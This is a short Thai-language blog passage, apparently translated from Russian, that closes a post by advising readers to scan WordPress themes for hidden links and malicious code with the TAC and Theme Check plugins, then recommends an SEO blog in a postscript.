บทสรุป.ก่อนจะติดตั้งอันใหม่ เทมเพลตเวิร์ดเพรสตรวจสอบไม่เพียงแต่สำหรับลิงก์ที่ซ่อนอยู่และโค้ดที่เป็นอันตรายด้วยปลั๊กอิน TAC แต่ยังรวมถึงบริการ ThemeCheck.org หรือปลั๊กอิน Theme Check เพื่อให้สอดคล้องกับมาตรฐาน CMS ล่าสุด

ป.ล.เมื่อเร็ว ๆ นี้ ขณะเรียกดู TopSape Reader ฉันเห็นบล็อก SEO ใหม่ zenpr.ru ซึ่งครองอันดับที่ 1 ในบรรดาบล็อกเกอร์ในแง่ของจำนวนคลิกต่อเดือน เมื่อพิจารณาว่าเขาอายุได้หนึ่งเดือนกว่า ผลลัพธ์ที่ได้ก็สมควรแก่การเคารพ การออกแบบเป็นสไตล์มินิมอลลิสต์ถ้าไม่บอกว่าไม่มีอยู่จริง แต่ผู้เขียนเขียน - คุณจะอ่านมัน ตรงประเด็นและไม่มีน้ำ เช่นเดียวกับในชื่อบล็อก – “ไม่มีอักขระพิเศษ” ฉันแนะนำให้อ่านคุณจะพบข้อมูลที่เป็นประโยชน์มากมาย